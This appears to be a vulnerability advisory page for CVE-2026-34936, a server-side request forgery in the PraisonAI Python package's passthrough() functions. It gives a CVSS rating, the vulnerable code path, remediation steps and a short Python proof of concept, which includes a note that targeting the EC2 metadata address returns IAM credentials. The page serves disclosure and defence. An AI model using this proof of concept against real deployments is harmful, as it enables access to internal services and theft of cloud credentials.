CVE-2026-34936

HIGH
2026-04-01 https://github.com/MervinPraison/PraisonAI GHSA-x6m9-gxvr-7jpv
7.7
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Patch Released
Apr 02, 2026 - 14:30 nvd
Patch available
Analysis Generated
Apr 02, 2026 - 00:15 vuln.today
CVE Published
Apr 01, 2026 - 23:21 nvd
HIGH 7.7

Tags

SSRF Elastic Redis Kubernetes Python

Description

### Summary `passthrough()` and `apassthrough()` in `praisonai` accept a caller-controlled `api_base` parameter that is concatenated with `endpoint` and passed directly to `httpx.Client.request()` when the litellm primary path raises `AttributeError`. No URL scheme validation, private IP filtering, or domain allowlist is applied, allowing requests to any host reachable from the server. ### Details `passthrough.py:92` (source) -> `passthrough.py:109` (fallback trigger) -> `passthrough.py:110` (sink) ```python # source -- api_base taken directly from caller def passthrough(endpoint, api_base=None, method="GET", ...): # fallback trigger -- AttributeError from unrecognised provider enters fallback except AttributeError: url = f"{api_base or 'https://api.openai.com'}{endpoint}" # sink -- no validation before request response = client.request(method, url=url, ...) ``` ### PoC ```python # tested on: praisonai 1.5.87 (source install) # install: pip install -e src/praisonai # start listener: python3 -m http.server 8888 import sys, litellm sys.path.insert(0, 'src/praisonai') del litellm.llm_passthrough_route from praisonai.capabilities.passthrough import passthrough result = passthrough( endpoint="/ssrf-test", api_base="http://127.0.0.1:8888", method="GET", custom_llm_provider="__nonexistent__", ) print(result) # expected output: PassthroughResult(data='...', status_code=404, headers={'server': 'SimpleHTTP/0.6 Python/3.12.3', ...}) # listener logs: "GET /ssrf-test HTTP/1.1" 404 # on EC2 with IMDSv1: api_base="http://169.254.169.254" returns IAM credentials ``` ### Impact On cloud infrastructure with IMDSv1 enabled, an attacker can retrieve IAM credentials via the EC2 metadata service. Internal services (Redis, Elasticsearch, Kubernetes API) are reachable without authentication from within the VPC. The Flask API server deploys with `AUTH_ENABLED = False` by default, making this reachable over the network without credentials.

Analysis

Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. …

Sign in for full analysis, threat intelligence, and remediation guidance.

Remediation

Within 24 hours: Identify all deployments of PraisonAI Python package and audit AUTH_ENABLED configuration settings; disable passthrough() and apassthrough() API endpoints immediately or restrict network access via firewall rules to trusted sources only. Within 7 days: Conduct forensic review of API logs for unauthorized api_base parameter usage; rotate any exposed EC2 IAM credentials and review CloudTrail logs for suspicious metadata service access; implement network segmentation to prevent internal service access from PraisonAI processes. …

Sign in for detailed remediation steps.

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Sign in - Free

Priority Score

39
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +38
POC: 0

Share

CVE-2026-34936 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy